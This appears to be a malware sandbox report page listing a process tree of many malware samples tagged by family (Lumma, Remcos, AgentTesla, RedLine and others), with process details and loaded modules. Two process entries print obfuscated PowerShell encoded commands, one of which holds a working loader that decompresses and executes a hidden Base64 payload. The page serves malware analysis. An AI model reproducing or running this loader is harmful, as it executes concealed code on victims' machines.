start main.exe conhost.exe no specs #METERPRETER main.exe cmd.exe schtasks.exe no specs cmd.exe no specs taskmgr.exe no specs powershell.exe no specs conhost.exe no specs bitdefender.exe no specs worldoffice.exe worldofficee.exe agent.exe lollo2.exe lollo.exe wxworkmultiopen.exe no specs conhost.exe no specs conhost.exe no specs 4edsfzc.exe no specs powershell.exe no specs powershell.exe powershell.exe no specs conhost.exe no specs conhost.exe no specs wxworkmultiopen.exe no specs conhost.exe no specs wxworkmultiopen.exe no specs loader.exe wxworkmultiopen.exe no specs conhost.exe no specs client.exe no specs conhost.exe no specs conhost.exe no specs regsvr32.exe no specs tamisemi_vyuo_vya_umma.pdf.exe no specs #DCRAT startud.exe transformer.exe no specs mshta.exe no specs mshta.exe no specs #STEALERIUM plctkles.exe #KOI powershell.exe mshta.exe no specs mshta.exe no specs comdgpx.exe no specs safefinder.exe conhost.exe no specs #REMCOS ap.exe sosi.exe no specs #KOI powershell.exe msiexec.exe no specs conhost.exe no specs loic.exe no specs installer.exe no specs powershell.exe #GENERIC ganja54.exe f.exe no specs adobe_plugin_installer.exe no specs ganja180.exe no specs runtimebroker.exe 80ak2ymfb6vbkeu.exe no specs #AGENTTESLA marcuss.exe werefult.exe no specs windowsupdatelauncher.exe powershell.exe #XWORM b7vrzcg.exe wxworkmultiopen.exe no specs dumpaaduserprt.exe no specs jtemt5nxbrnq5jc.exe no specs 1.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe payload.exe ganja61.exe no specs #GENERIC ganja177.exe bin.exe no specs reverse_shell.exe no specs whisker.exe no specs cp1n8fc.exe #DBATLOADER lol.exe doppelganger.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs #XWORM regsvr32.exe conhost.exe no specs cmd.exe no specs msiexec.exe no specs regsvr32.exe no specs conhost.exe no specs conhost.exe no specs klass.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs msconfig.exe no specs ganja132.exe no specs conhost.exe no specs regsvr32.exe no specs ganja151.exe no specs #GENERIC ganja5.exe prolin.exe v999f8.exe no specs capcut-videoediting_12.1.02.exe no specs tzcyberninja.exe ganja46.exe cmd.exe no specs cryptolocker.exe demon.exe demonx64.exe march.exe baboon.exe https.exe #PHORPIEX kajmak.exe ganja66.exe #GENERIC ganja20.exe conhost.exe no specs conhost.exe no specs ls.exe #LUMMA svchost.exe regsvr32.exe no specs regsvr32.exe no specs conhost.exe no specs {34184a33-0407-212e-3300-09040709e2c2}.exe winsvchost.exe explorer.exe ls.exe no specs lsssk.exe no specs #MODILOADER adobeart.exe #NESHTA setup.exe ganja2.exe no specs {34184a33-0407-212e-3300-09040709e2c2}.exe no specs attrib.exe no specs attrib.exe no specs outlook.exe whqmcgn.exe ganja85.exe no specs cryptowall.exe no specs ganja121.exe no specs #DBATLOADER test1.exe conhost.exe no specs #NESHTA setup.exe conhost.exe no specs ganja176.exe no specs eg11t89.exe msconfig.exe no specs explorer.exe drivers.exe no specs ganja128.exe no specs ganja45.exe no specs cmd.exe no specs 123.exe #NJRAT bloxflip%20predictor.exe ganja49.exe no specs ganja3.exe no specs tomcat8.exe no specs powershell.exe no specs ganja107.exe no specs ganja39.exe no specs ganja90.exe no specs ganja35.exe no specs conhost.exe no specs ganja154.exe no specs conhost.exe no specs bot.exe 90.exe no specs ganja190.exe no specs zwmtvdks2rnf9im.exe powershell.exe no specs powershell.exe no specs powershell.exe no specs anap.a.exe no specs conhost.exe no specs powershell.exe no specs hersey.exe no specs powershell.exe no specs trip.exe index.exe rxd_en_1.exe joker12321.exe setup.exe(live%20protection%20suite).exe svchost.exe build.exe c2_payload_aes.exe clien123.exe powershell.exe no specs powershell.exe no specs ganja168.exe no specs protect.oxcy.666.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs msbuild.exe no specs conhost.exe no specs msbuild.exe no specs msbuild.exe protect.oxcy.666.exe sgn.exe no specs #NESHTA setup.exe powershell.exe no specs me3_setup.exe no specs brontok.exe no specs powershell.exe no specs porn.exe linkingg66%206.exe no specs ganja174.exe no specs rod_en_1.exe ganja113.exe no specs #QUASAR client-built.exe wxworkmultiopen.exe no specs ganja36.exe no specs ganja153.exe no specs llll.exe no specs pe2shc.exe no specs eu80ak2ymfb6vbk.exe no specs wxworkmultiopen.exe no specs vjvpndfx.exe no specs yc.exe abokiii55%205.exe no specs cron123213321.exe no specs reseptionprovider.exe no specs #GENERIC syspool.exe tcp_windows_amd64.exe shell.exe ganja172.exe no specs dp.exe no specs #NETWORM amus.exe ganja99.exe no specs moi.exe no specs ganja199.exe no specs rmd_en_1.exe cryptedcron121221.exe no specs services.exe no specs obii55%205.exe no specs rickroll.exe no specs #GENERIC cabal.exe minerd.exe no specs celkadrobitel.exe no specs bugsoft.exe no specs ganja195.exe no specs alex123123.exe no specs win7.exe no specs neploskiy_crypted_lab.exe no specs #REDLINE cc.exe dnd.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs assiah.exe svc.exe wxworkmultiopen.exe no specs schtasks.exe no specs ganja13.exe no specs adobe.exe linkinggg55%205.exe no specs ceng.exe no specs axam.a.exe ffdf.exe ganja165.exe no specs set-2%20firmware%204.01.exe final123.exe pdfconverter_p2w154-zx-666.exe ctfmon.exe conhost.exe no specs conhost.exe no specs lv.exe no specs nxtpprk.exe no specs freeman.com conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs terminal.exe svchost.exe conhost.exe no specs jzqilrf.exe msiexec.exe #IRC ctfmon.exe regasm.exe no specs #MODILOADER 90.exe regasm.exe no specs sloader.exe no specs cmd.exe no specs protect.oxcy.666.exe no specs setup.exe setup.exe no specs rexcel~1.exe no specs setup.exe no specs setup.exe no specs rmo_se~2.exe werfault.exe no specs protect.oxcy.666.exe no specs msconfig.exe iexplore.exe is-nc47t.tmp is-4hi07.tmp net.exe no specs conhost.exe no specs powershell.exe no specs msiexec.exe no specs axam.exe no specs iexplore.exe no specs axam.exe no specs axam.exe no specs axam.exe no specs axam.exe no specs axam.exe no specs axam.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs net1.exe no specs cmd.exe no specs axam.exe no specs attrib.exe no specs dnd.exe conhost.exe no specs axam.exe chrome.exe no specs powershell.exe no specs axam.exe conhost.exe no specs axam.exe chrome.exe no specs msbuild.exe cmd.exe no specs cmd.exe no specs #SNAKEKEYLOGGER obii55%205.exe conhost.exe no specs cmd.exe no specs #REMCOS abokiii55%205.exe axam.exe csc.exe axam.exe csc.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs csc.exe conhost.exe no specs #STEALC msbuild.exe cmd.exe no specs cmd.exe no specs chrome.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs axam.exe conhost.exe no specs axam.exe msbuild.exe no specs msbuild.exe no specs conhost.exe no specs axam.exe msbuild.exe slui.exe no specs chrome.exe no specs msbuild.exe no specs axam.exe msbuild.exe no specs axam.exe #LUMMA msbuild.exe cvtres.exe no specs msbuild.exe no specs axam.exe #LUMMA msbuild.exe werfault.exe no specs axam.exe mshta.exe no specs chrome.exe no specs powershell.exe no specs rundll32.exe no specs msiexec.exe no specs chrome.exe no specs msbuild.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs rundll32.exe chrome.exe no specs vssvc.exe no specs axam.exe conhost.exe no specs csc.exe cvtres.exe no specs cmd.exe conhost.exe no specs csc.exe chrome.exe no specs powershell.exe no specs tasklist.exe no specs powershell.exe no specs cvtres.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs wmic.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs attrib.exe no specs powershell.exe no specs cvtres.exe no specs cvtres.exe no specs dnd_x86.exe chrome.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs axam.exe no specs schtasks.exe no specs conhost.exe no specs chrome.exe no specs regedit.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs main.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
592\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
728\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
756C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "#   7 d R g D o - a = 5 } K w Y k 9 z ) C n 0 7 M O $ f N : v k M - i n C d ( $ - W = z H 6 Z : ; L a h S 5 y h m 6 I _ 6 # u b 9 t z % @ R Q > c d 2 q 9 G 9 3 F e N t % $ _ Q R V , ) O l ] ( | G > A # q - b U Q - M + B c x U v : A t T . X | Y d o p $ G : X Q T X u O p 1 [ 1 R p 3 o ! E 5 = G T w ? 7 M , P C , D f T T 1 a P V | * a J c { T } W O 7 & < 3 6 q 5 K M f J f Z T T . 2 b 3 z : e H % O t L P ? z X X , i ^ N % ] j N % } 5 _ v , p m B l I l = ; 6 r r k K T l 0 k g < 8 m , > ! 7 y w V ; B P r { i ^ E   H ? J _ c S T j K , j , h 1 T M I 2 ! 7 * u l g Q X . ( G . 5 z u _   8 ] d 8 # i Y n ; $ - Q - 6 ) + N 9 j l & C M S ( M @ 4 } j i T @ i i _ t j 0 ) K * h E B | < | k t r t 0 A % M ( 1 , X s k n O : J y h I Y X O r F ^ - + y X O p { = n c v @ z N ^ O H f q 0 # ! . 2 F > ] & . . K w R C V 8 d D ) # 5 % * 8 V Z o ? D ^ N t 2 e W @ 7 y c Q + | @ M m M v S Y b ) 3 p m p U t 3 e ; y 3 z B x 7 d p n $ 9 u E 9 K ^ G 7 . d P C v o b % { _ f T r 1 _ G _ S 2 _ ? g s D ^ ; { (     h g } G o 6 A } G u | n # u c 4 ) T S $ g a W 0 3 j & K A & @ 7 V > o ) 9 S [ X & g ) X ) S ] 7 % D } u * E _ 1 u c H b 4 o $ Z m ! z c c ? 0 B w ? 5 Z l 8 6 } _ ; m } n r ^ # O G 3 I ? a : Y D c Y < + r ) J h X W b 3 v C 8 S X ] ) 5 { K % Y X B F Z { i 5 & ; h J D J t A M = * S o = 4 ^ k $ F U w 1 B o X O @ b S L k 9 ; 7 c T S h G , z X o O t f & W } Y U ; q v E E f i [ 3 M @ 3 ) ; . ^ 5 U * f v O [ } t l 3 M F Q u > ) C < g $ : O 7 Y < 9 ( B t Z $ d l h z | < o # . i 2 r C S s l 6 Z C Z 9 ! d - x y k l } t & E l Z L ! @ e - , 5 - c A w ( O N . _ # I O 7 P T ( $ z i , o ] 4 } D & t 9 6 v B  
     #   v y _ n 5 b x C R 0 < W ; k 7 * w 1 v a n f e $ > M _ ? . v l u u _ ? 6 O x . W ] u 4 } ] Z 8 c J V N ^ % I z g H f f   ! Z 9 _ h q r 6 3 T s H T L Z 4 , < M : # W : + l q H . 2 r J w y P h v 1 2 ; S B < E o K Z $ f 0 W A v # 3 ] I X b d T . [ C 2 C ^ # { m   k _ y h 8 C f 6 ! R a R _ ^ m N G Z i O % a O Y z b , K . | t G + c e Z X d 5 U Z 4 H W V G D n { c < 2 E e # v h ) { I ) Y J $ T d > ; ! { < E { 4 ) c o l G v K l m G d v & C ^ p . W % q p S F a + 6 h + + 6 f 4 J 3 { o l 8 s - g 5 J H Q - K U y W = U y V ; u e y w B z 4 T ! ; 3 1 ! g I 9 $ G ! $ h 1 @ Z < W m V X e z | m B { d + g K _ # > a T [ < n N   % $ ( : # A u ? G < ! ^ ( . N 0 q H D v | h 4 J $ n * L J } + | G 5 P k : y M | } X W v O m 4 J + N w @ a X C 2 2 . ) 3 a 6 % : z B W d o c u s H & N o J q | S I h ; _ 3 T T M + k 6 U 6 t + w j 7 s _ Z H x [ Y z % W @ 0 B < Z 5 : ) C j j - R h 2 A x g } ; * K [ H [ Q W c t 7 M n 2 $ r o r ^ a } R i [ d X v i C b E - O W ( M g 2 + & k ) _ n i J + o b + 2 J % G # . 9 c G > U D p V N : ] > ? y N < i = w - i = d a ( , o S 8 X h 4 }   d 0 ; h ! # Y ^   D h ? v v K v a + y - 8 ] ^ 6 8 r P j m & % u F ; H o x . i V y + ! R J E 2 l g < ^ v v   6 - ( ) [ D 2 L * F ] 3 H U 7 O [ # F e 9 S g t I , n g f ] B 2 w s c q { > j ] r > ) 4 N F : Z i O L B 4 H H O O X ] y # W E ? r ( @ J g h D Y T { 1 ^ ^ # } | ] A q z v R I c 0 F m ( < | L j e S 9 < 8 < p N A H A r d v 5 Q * 0 b * U { L 8 - 9 | f # # r 4 V m s z v c * D : < Z m z v t - R ) U F t F W Y ( s - 0 > W v B d 9 v [ ^ t z > V   e B ( z C x ^ m * 7 B f K u h - y D k , p f 6 Y f [ c _ e u Y l Q J 9 t h   p ^ > 1 t v d y f _ = i } { 3 ] e c ) & - < g C u Q ! F x H - Q ! 0 C W ) = k J g # E o ! L 8 j 5 Q t + W ] + k { H 3 # 0 , C b ] < h J N J ? g p ? ? _ J l V + m b V J d 5 q D 2 f 6 4 j m P p B S m ; P O y S I } . $ m I I 3 a $ J T a } , + q a B y 9 i T e k # a k v + { : { o y d v  
             $ a =     8 8 7 2 ;  
   $ b =   ' C : \ U s e r s \ a d m i n \ A p p D a t a \ L o c a l \ T e m p \ t m p 7 6 D 4 . t m p ' ;                 & ( $ s h E l l i d [ 1 ] + $ S H E L l I D [ 1 3 ] + ' x ' ) ( n E w - o B j E C T     s y s t E m . I o . C o m P R E S s I O n . D E f l a T e s T R E a M ( [ i O . m e M O R y s t R E a M ]       [ c O n v E r t ] : : f r o M B A S E 6 4 s t r i n G ( ' p V T R b t o w F H 2 v x D 9 4 i I d E M s i j a J q K I p W G d q v U a h V 0 W z X E g 0 l u S T T H j h y n D S v 7 9 9 0 k Z o U u G 0 V 7 i e + N 7 X P u 9 T n 2 K A y 7 t 6 s U S P U d w 3 0 s Y x M r S U 7 b r a M 8 i + W S T F e Z g W R I t r P e J J c m T q B 3 K Q 1 o l U 5 B P 8 Q B Z M P W U Z o v R B y Q Q P A s I 3 d P J F A y M y S P p S E j j x W M s T 4 9 K 4 M B Y 9 S v / 7 y n 4 y r o M 3 p e B W 8 Z I s 3 G Q l w m q d L G a X 8 H L U E c 9 9 v u P D P c I A E U y C w J F n B j N P m U g r z R C k v I n I q r o A u l B F n R K v v h v h a v 2 u U L l c F H L k M B j i U o X o 1 g N 3 y J t c m 5 G A m h g v P i N w y 1 w a a w e u D 1 s D i s z K 8 6 N m C 7 v o Z E 6 V U D z W J l Y D Z / J l K 5 V e N A M t s P 0 h k I T G N H n 2 3 0 3 1 w X I s + i S / S N z o P S j T 4 P I v g X 4 a H i + B q 4 g Q m e m Y H b C J P w 7 w L Z n G + C R T 0 R b P L Q f X a 9 J a u a m N R G T D c K h O 6 T 3 R F 5 2 3 Y d r c / W / n q 8 P q f 3 X G R A 0 x I v v n c i z 6 v X 9 7 7 h F X M 1 m B w b q N Y M L V D i v X B Z R L e 2 0 K o A N + x d g V y a i L L i G O / a m h V 9 H D A b M M u U 7 D I 9 b d s / c o c 7 z D + r p t S Q 4 L 4 3 f 3 g i o g l 1 r C r b x A N W e U G 5 e 8 D x z S n h H 4 c l e o O 9 S / z w Z V 8 l 8 u N + 5 B K y 2 V i N V e 8 H t C I Y r 8 F N u 0 I w J N j N t 8 + 7 F s E c I k L z J H a F c 1 h Z + 5 R 0 r 7 h c 5 n w J x J 9 G X K e t o 0 7 o z X w l H 0 C b + c n J h V b J G c / g 3 W B q N D 7 s j v M B T B f n D a A A 3 Q l / J J 2 F 6 + K 1 u s P V E 2 d W n v l x f 9 7 h t B P i 7 1 8 = '       ) ,                 [ s y S T e M . I o . C O m P r e S s i O N . c O m p r e S S i O n M o d e ] : : d E C o m p r e S S         ) |     %           {             n E w - o B j E C T           I O . s t R e a m r e a d E R (     $ _ , [ S Y S T e m . T e x t . e n c o D i N G ] : : A s c i I               ) }  
         #   = Q l ? k Q Y D f c R [ M H 1 j l & > j f J 4   - a 9 w h j N o 7 4 I 7 : o 3 O p | 7 G < * ) s { % K T c z z F 2 9 y q { L ( c : > m 0 * V 8 | V c 8 8 $ ( J , ] z e G Z h [ O 5 r J x [ _ a 3 | i V | E o 1 ; z & 7 _ K O s 3 H j 6 k [ g { } < : 8 ! S 7 A L d P + 5 d K ; d ? V f f M c z Y q 9 b d , p > # ;   o L U p D 2 - - q C k W L 2 I 5 K a w X P ! < 4 + q S v % o Y Z L y k > $ 9 & 3 b k q z A Z L 6 m o l k G 2 ) ( 2 F H w c E % { L   P e D z % o B 2 $ Y   V N = - 3 a , E h Q } + s H b | = 8 i X   m z S Y B ? q V G y 6 # i U e f ) ( Y y = h b + - q M $ i r :   D m ( p 7 0 X G ; = P h ; i x ) 9 = = M j ; ! S O { M ) a ( | i R . 5 2   m ; L u R ; v S z K o ; d { j , 7 g v z W P p t : o = - 5 n } 3 K N $ x ) S 2 5 X > M ? t I v _ x Q f 0 # - & $ l a b 5 A & O j = } w ) C s o z | 1 n x ! L g d % f {   W i A O P * J ! T # N { r 5 u 6 c & | | 0 6 Z K ( l D 0 X q | U v f M T Y 1 6 4 M c { 0 Z C , + @ & 0   [ R b b 1 m j W   6 ] y @ 6 @ f w ] n b < a q J 2 n 9 y y { H o ( + U 8 i v 5 4 Y M L g 1 : > ) I + m } [ : } G L n u { & ; R C W % { b N 5 | # , P S * 7 % } v 9 { Q > R * a F | , o a v t ; t Z : * $ 8 s 9 w g m C c i ( _ I E k Q ] d I r Z 6 O o 3 M J , L ? S X Q @ , H , d H & 4 p @ x x < 8 . c W S L ? 5 q { T ] U 0 d :   @ V : 4 g ; ( y ( ; X X < U h 4 , * S z Q R D : t w s b Q # $ B : , , A G 3 X ) * w < G : ? U + = V _ P I h & X Z n c R b w $ Z e _ 3 z # g $ s : P d B M u S C 8 . & 5 j l # s c 0 M l  
           #   m L l G w & x k k [ U Z } p x = C R } # N - ) R , Z R 5 l t C I Z A B d | y I @ 2 p ( n N 3 J n L I g 4 = + i ] * , - - [ q : V D m o a   U G w [ O _ X + 6 ^ i Z , W j k 8 ; ) = l Q D i U } 9 X q u j Y V e _ L 0 c 5 0 P 7   l = T k @ e d @ B q j . - H z ! F B 9 5 # g d , ! + T R 4 h % M ^ v 4 M X Y * ) $ G 7 M ? < 6 M 1 # % e J ; S M g B M B m ? U e 5 - R H v 0 o * % = n y A 0 o ) ! ; n f j # 2 5 2 8 ] 7 ] C I B s I + { ^ x 2 $ 9 G x s & u % C 5 H < b P a s u v # D n T M h : f o K W 1 f j | d 9 G 0 W ( ] H M @ 5 C S n P   ; | [ > K + 9 $ } s R e d e A ^ q W v 5 S 3 e 3 # $ F 2 Z 3 Q Q 3 ( ! d 1 > A r R Z 4 c Z $ 5 ; 1 1 O 5 J 3 > s h < * l 4 j M W k ] : w F % = W t 5 l K e n B E 1 E 7 b 2   W s k S k d { % r L q m   V # k 5 : 3 Y d w O J m Q s G I D i F S l N j * . c T I E ^ B 6 P < v >  
                 #   H Q $ ! K w F D 8 9 N & p , , J h 7 6 9 j * < $ } [ J Y w > 3 R I 9 G ^ z V A i ?   z = W X q H = U Y M k F 5 + $ > < { k f K c # W ^ ) , > d = + } i { H v C a y G r ) @ w d l n j 4 r z ^ s $ q I N B & < ( 8 0 8 u S C 3 s 3 k k 4 h = . { q X U ; 9 } c 7 = @ y U - j e y z & 8 d M } w A n U h I m ) + y G < 3 @ @ E @ M U Y m s b t ( @ % : H ? ; m i H a @ m } , } o C H H + I S X ! ? } U = ( 0 ) K m s < = E 9 5 { N 9 - 9 j } > i X } U ] q [ g   g 5 d r | X U k O Z O ] < G | # A 8 ; + : o ! w f x O = X + T 9 [ N Y 3 % | k @ 9 o # + b ! h ] s i : . q c = R 3 n ) 9 L v X n S | J v A < X > d < n : P z ( ! . c T z v x ! u j V 5 N Z h R q Q n > x o = . J ) C H T V 3 = _ R T c c N W M x * | = X V t ? D K d _ ! I W ] 4 f f ) u 3 O 7 i H * X N I Q D Y   t & = m R ] N e D H f 0 = , c T y | N . 0 # ^ a : S V 7 & X h H T i | d A { 4 X L E T g F m F { N } n p i l ? C 9 H | W M s T 0 w Y l * j - , t D $ 9 4 m   . R t g c 9 > - # ( ; : 4 2 r N , ] > D e A ? : q f * R P X } h ] ? ; n R H s 4 l ] x M @ U n s m 9 2 U ; r 0 . l ? = 9 w X I i h _ l H   O i ] 0 % + S T J s F m ] ; ? { % C E H m ) { f V f [ M 7 j h R d h e m h R | h = } [ = g h 6 . W ^ G   R P r L 1 a B h D < $ } C 3 O a % - p O 9 | b s ^ : p t R . ^ T h e G ) ? 2 1 i P ? c z # E & @ _ > O E = 5 a k 1   + m F w 7 C 8 G x 5 c Q G # P b , K r V o # p M @ [ h * Q k , 2 z j 6 t $ C O 7 t m @ L y . { a 5 5 0 G Z c y - C 8  
                               |  
                 #   @ ) e O O h L ; : % G 7 W d G 6 8 y : + } A ? O o N 4 L ! | Z ( b s + 1 _   m x d 0 B W s s n e q A 6 H ; = & ) H l T $ c d A $ L H = y L 3 x c N u Z I . 8 y f n * X p z @ o ? = k 1 X N F u c r L a v b D l 0 w G J A . g I B w % { 9 l @ d l c ! T } u q 0 i & r w a Y { + X T g * , i U I K E _ E { - m 2 c 7 A 7 s O Q G # | w @ g r { J M j } # I v U s ) 7 [ _ ^ V = E c ^ U 7 % * o > 6 K n 0 b K Q Z u + { V % p F Y B $ T r _ o [ ^ o r W V + 7 i d F f   5 h $ E   ] m I I 3 B Q # M N ) % B = R p < % W ) ? . $ E   _ c Z u d * 8 ^ 6 t 1 S B F % @ > n | , 0 0 S ( | 2 O 6 0 D y v h c $ } B B { E Z N [ W - % k 7 y 1 P 8 x q 3 O ( b A y x f > 3 O 1 S h D d 4 > 2 Z H m # 2 1 a S I ( W ! 4 u F :  
               %           {  
   #   B [ n d E , M a f X x S y r 7 R U n K o 9 H d | { T b x S R r C 8 o 4 C + G P L w G a | ) : O 2 A d D * % ) ^ p 9 a i 9 X W x J   o J k > 6 o G d 6 G w Y G - ^ + { 5 B 2 [ N f f g $ K { i ! z # + 4 o } ? p l 3 l m + A b n * & M $ Z { h X u [ k ( z L l N * ^ 2 c Q 0 | A > ; M 0 & E ^ a L J , E R @ c &   8 @ Y z B t @ R ! m : } w o i , 5 ( J E i @ ? h > 8 ) 5 . W 3 x j v j N A [ K g % ! s C a : M 5 ] 2 x 5 , D m e ! _ [ 4 q 2 l m - Q z [ k b C A _ H < , [ , , o | r I t Z N   G k } 4 V n > ^ a l & u m > , 4 [ U Z j o O * E ) T J ;   I 9 D L r v - ! c h v 0 { l s l T F y K 3 l 7 Z I U = 2 O X < * & ( . Y 6 { ; I P 2 T Y E # 5 3 w - | o w @ G 5 < < g a f P u ( P P z U _ m | c P X _ ^ H U Q = R & 9 i ! l 4 h 9 8 v - # W = ; 7 N l . { ( b X q ( v N K g n b k h > [ s h G & 8 G i v 6 r * c | O Q L | o ( _ n D 5 W & a : m P b q : ; M b z H > s @ D ? X _ D t   b , x M G t h [ . c , I > } E w ? & o _ : < < n ! P J O C j ? L = + d 4 P A # C l T v } m y | $ e L Z S p y   - t : B P c j A t v b u C 5 [ I C 2 r + , ? x a H t W n x w : z P r | V # m - { G Q C T v Z c l g * } r O T ) R y [ % : y - J 1 5 # j D } | e * ) 1 ? F F S E s 9 u S * ] + 6 ! 5 Z _ D . h n d e ! 5 X 0 | V v Q . F f 6 b A ] a H # s d 6 P C K % u E ; N G u ? < y f J - L U n C Z D ) ) J _ , S { 6   m g } e m 2 B J 7 m F 1 D h A F d 5 f : d 3 L ) ( , P > ? | N e | 2 n ) q & C | % e + 5 B p o W d N B 1 v Q . b . P f 0 _ . 0 r O H ) ; N e g R c n t X o G S z t i J I . { t ) s 2 } G N ? J g n X R Q $ w # o R p D V 3 B * Z , O { . v l I : N = Z _ | : X 5 q R 5 Q > . 3 S 2 } S B 5   8 k | 5 ; & Z H O - # M U & O M < u A : # Q ? O C + ( j p F u ? _ p r R S f v ? # $ ( ^ v # n B  
             $ _ . R e a D T O e N d ( )   } ) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
1180\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1636\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2168C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "#   k 0 # b A h S B 0 2 a q x n O { i 2 % _ 3 l . L W Q d O P | f ^ T 7 ? 7 F Y + ! ^ + O c 7 L # e F Q = : D { 3 g k w X Q _ 7 j L F a v y V V 3 E d 0 B l J J < * S $ < [ l V < . + 2 p t , ; C + P p w R Z O e R $ > k J 3 j q 2 V H ; I P M . C l G Z - W G D l H W u u S H w M ; h G b $ t P l 2 x ; C D E t E ] ( Z 1 # l B T J 4 ; j # % 4 6 & % H c . I : Q 5 v & x 1 e 2 O c z } Y = $ u H z ; h P h a < @ b G a 1 8 # 4 y S c ) { S o $ R & ^ F 7 ) N l k & l J $ % , L S 0 o 8 f t u I _ X @ Y M _ w ^ ] p | D : D q q G d s K l d P O m Q N d 0 x 7 . w ; i = M y ; r [ r D Q - 5 O 1 K 0 { ^ ; 5 l j ) : $ = - k d S C F e : g f y J 1 = s ] k h 2 } i @ t z i G f u > : h < ? ! , l | C l w P * 8 } c @ 8 0 m G w   , | M # A # B N C - 0 ( < { + R Q @ s 8 z  
         #   p o n - g j ! % h { k y , D b = = n , Z M R _ 4 s L p d + d 4 R , u & M n D d 5 d < X v 2 r A K 5 e : T L j Q , 8 L D } A - $ Q = 6 S 0 , b b t o U T u 9 a . c Y I { t A @ D 8 T E   ; D + = } X j w T E [ E D D ( I b ! ? X : J _ P J ] ) N F s y r ; , q Z % l 4 z . H n w a X H } l A p V P * Q z g ? A # } 6 [   b b y N m g 8 a S & n + ? _ Z N v C a } . I L u H J P @ x U 8 T   H w F a , F n $ & I C 5 o D : 4 | i   H & w K l S v + > j j D ^ & ] r a Z , u : . S E 0 S  
